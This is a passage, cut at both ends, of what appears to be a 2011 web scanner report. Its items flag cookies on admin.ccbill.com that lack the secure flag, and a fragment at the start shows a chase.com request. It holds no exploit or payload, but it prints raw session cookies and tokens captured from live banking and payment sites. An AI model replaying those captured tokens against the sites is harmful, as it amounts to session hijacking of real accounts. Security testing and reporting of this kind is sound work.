Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=jpmcchasecom%3D%2526pid%253Dhttps%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/individuals/shared/page/OpenAnAccount%2526oid%253Dhttp%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/smallbusiness/business_banking/page/bb_checking_o%2526ot%253DA

targeturl=https%253A%252F%252Fwww.chase.com%253A443%252Findex.jsp%253Fpg_name%253Dccpmapp%252Fsmallbusiness%252Fbusiness_banking%252Fpage%252Fbb_checking_overview&zipcode=10011&submit.x=19&submit.y=13

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:27:58 GMT
Content-length: 3726
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=b3htTc2TXm501fjhWlLCyxYR5L9TfZdjhpBQbQLJvRlyl8ClTHFL!1272186516; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>
<html lang="en">
<HEAD>
<TITLE>
</TITLE>
<script language="JavaScript">


//-----------------------------------
...[SNIP]...

7.2. https://admin.ccbill.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmc=250776793; __utmb=250776793.6.10.1310490247

Response

HTTP/1.1 302 Found
Date: Tue, 12 Jul 2011 17:14:51 GMT
Location: login.cgi
Content-Length: 193
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="login.cgi">here</a>.</p>
</body></html>

7.3. https://admin.ccbill.com/adminBanners/blank.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /adminBanners/blank.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adminBanners/blank.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:02 GMT
Last-Modified: Sat, 23 Oct 2010 00:42:07 GMT
ETag: "53eb57-31-4933e075355c0"
Accept-Ranges: bytes
Content-Length: 49
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/


7.4. https://admin.ccbill.com/ccbillLogin.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ccbillLogin.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccbillLogin.css?2 HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:03 GMT
Last-Modified: Sat, 23 Oct 2010 00:03:54 GMT
ETag: "41124b-3b31-4933d7ea6ee80"
Accept-Ranges: bytes
Content-Length: 15153
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

html {
height: 100%;
}
body {
margin: 0px;
height: 100%;
width: 100%;
padding: 0px;
background-color:white;
scrollbar-3d-light-color:#cccccc;
scrollbar-arrow-
...[SNIP]...

7.5. https://admin.ccbill.com/ext-2.2/adapter/ext/ext-base.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/adapter/ext/ext-base.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/adapter/ext/ext-base.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:56 GMT
Last-Modified: Fri, 09 Jan 2009 19:53:24 GMT
ETag: "1680716-8c06-460121c1a3500"
Accept-Ranges: bytes
Content-Length: 35846
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
* Ext JS Library 2.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

Ext={version:"2.2"};window["undefined"]=window["undefined"];Ext.app
...[SNIP]...

7.6. https://admin.ccbill.com/ext-2.2/custom/combos.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/custom/combos.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/custom/combos.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:56 GMT
Last-Modified: Wed, 10 Dec 2008 00:38:55 GMT
ETag: "1680888-25e-45da67c1be5c0"
Accept-Ranges: bytes
Content-Length: 606
Keep-Alive: timeout=5, max=79
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
* Ext JS Library 2.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/


.search-item {
font:normal 11px tahoma, arial, helvetica, sa
...[SNIP]...

7.7. https://admin.ccbill.com/ext-2.2/custom/login.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/custom/login.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/custom/login.js?26 HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 23 Oct 2010 00:04:00 GMT
ETag: "41152-20f8-4933d7f027c00"
Accept-Ranges: bytes
Content-Length: 8440
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

var login;
var loginType;
Ext.namespace('Ext.loginstore');

Ext.loginstore.loginType = [
['-select one-'],
['Client'],
['Affiliate']
];

var alertBox;
var alertText
...[SNIP]...

7.8. https://admin.ccbill.com/ext-2.2/custom/password.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/custom/password.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/custom/password.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:56 GMT
Last-Modified: Sat, 23 Oct 2010 00:04:01 GMT
ETag: "57f36b-2bca-4933d7f11be40"
Accept-Ranges: bytes
Content-Length: 11210
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

var passwordWindow;
var msgWindow;
var windowType = 'lost'; //default window type

var accountType2;
var selectedOption = 'email';
var megamenus = (window.location.href.match(/(loginMM|megamenus)/
...[SNIP]...

7.9. https://admin.ccbill.com/ext-2.2/ext-all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/ext-all.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/ext-all.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:56 GMT
Last-Modified: Mon, 22 Dec 2008 23:37:29 GMT
ETag: "420aac-83c49-45eab2457e040"
Accept-Ranges: bytes
Content-Length: 539721
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
* Ext JS Library 2.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

Ext.DomHelper=function(){var L=null;var F=/^(?:br|frame|hr|img|inpu
...[SNIP]...

7.10. https://admin.ccbill.com/ext-2.2/resources/css/ext-all.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/css/ext-all.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/css/ext-all.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Fri, 09 Jan 2009 18:46:28 GMT
ETag: "5807b8-142ac-460112cbae900"
Accept-Ranges: bytes
Content-Length: 82604
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
* Ext JS Library 2.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

html,body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset
...[SNIP]...

7.11. https://admin.ccbill.com/ext-2.2/resources/images/default/button/btn-sprite.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/images/default/button/btn-sprite.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/button/btn-sprite.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:01 GMT
Last-Modified: Fri, 09 Jan 2009 18:48:12 GMT
ETag: "40a3b-53d-4601132edd300"
Accept-Ranges: bytes
Content-Length: 1341
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP]...

7.12. https://admin.ccbill.com/ext-2.2/resources/images/default/form/text-bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/images/default/form/text-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/form/text-bg.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:02 GMT
Last-Modified: Fri, 09 Jan 2009 18:53:28 GMT
ETag: "168094c-333-4601145c39a00"
Accept-Ranges: bytes
Content-Length: 819
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP]...

7.13. https://admin.ccbill.com/ext-2.2/resources/images/default/form/trigger.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/images/default/form/trigger.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/form/trigger.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:02 GMT
Last-Modified: Fri, 09 Jan 2009 18:53:28 GMT
ETag: "409a3-718-4601145c39a00"
Accept-Ranges: bytes
Content-Length: 1816
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP]...

7.14. https://admin.ccbill.com/ext-2.2/resources/images/default/shadow-c.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/images/default/shadow-c.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/shadow-c.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=37461042.1893489909.1310491136.1310491136.1310491136.1; __utmb=37461042.8.10.1310491136; __utmc=37461042; __utmz=37461042.1310491136.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:22:18 GMT
Last-Modified: Fri, 09 Jan 2009 18:47:45 GMT
ETag: "420e24-76-460113151d640"
Accept-Ranges: bytes
Content-Length: 118
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

...[SNIP]...

7.15. https://admin.ccbill.com/ext-2.2/resources/images/default/shadow-lr.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/images/default/shadow-lr.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/shadow-lr.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=37461042.1893489909.1310491136.1310491136.1310491136.1; __utmb=37461042.8.10.1310491136; __utmc=37461042; __utmz=37461042.1310491136.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:22:18 GMT
Last-Modified: Fri, 09 Jan 2009 18:47:45 GMT
ETag: "5808aa-87-460113151d640"
Accept-Ranges: bytes
Content-Length: 135
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

...[SNIP: binary image body]...

7.16. https://admin.ccbill.com/ext-2.2/resources/images/default/shadow.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/images/default/shadow.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/shadow.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=37461042.1893489909.1310491136.1310491136.1310491136.1; __utmb=37461042.8.10.1310491136; __utmc=37461042; __utmz=37461042.1310491136.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:22:18 GMT
Last-Modified: Fri, 09 Jan 2009 18:47:45 GMT
ETag: "16809de-137-460113151d640"
Accept-Ranges: bytes
Content-Length: 311
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

...[SNIP: binary image body]...

7.17. https://admin.ccbill.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:17 GMT
Last-Modified: Thu, 28 Jun 2007 17:58:59 GMT
ETag: "c9e92-1-433fb1df13ec0"
Accept-Ranges: bytes
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/



7.18. https://admin.ccbill.com/images/ccb_AffiliateSystemBanner.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_AffiliateSystemBanner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

